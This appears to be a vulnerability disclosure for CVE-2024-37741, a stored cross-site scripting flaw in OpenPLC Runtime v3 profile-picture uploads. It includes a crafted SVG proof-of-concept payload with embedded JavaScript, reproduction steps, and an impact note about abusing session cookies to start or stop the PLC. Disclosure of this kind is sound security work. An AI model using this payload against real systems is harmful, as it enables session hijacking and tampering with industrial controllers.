CVE-2024-37741 - Cross-Site Scripting (XSS) on OpenPLC Runtime Version 3

Description

OpenPLC’s Runtime, version 3 (https://github.com/thiagoralves/OpenPLC_v3) is vulnerable to a cross-site scripting (XSS) vulnerability that affects user’s profile pictures. An attacker could upload a maliciously crafted .svg image file and gain code execution via Javascript. The CVE assigned for this particular vulnerability is CVE-2024-37741 and can be viewed here.

Reproduction

Use this payload & save it as image.svg:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by 1d8");
</script>
</svg>

1. Login > Users > Select a user to edit
2. Upload the image.svg as the picture
3. Save changes
4. Right-click the profile image in upper-right hand corner > Open image in new tab

Our XSS payload is now executed

Impact

Since we can inject our own Javascript, we can abuse the victim’s cookie to do things such as start/stop the PLC or interact with the Slave device, or perform many other actions on the web application.

References

• https://github.com/thiagoralves/OpenPLC_v3/issues/242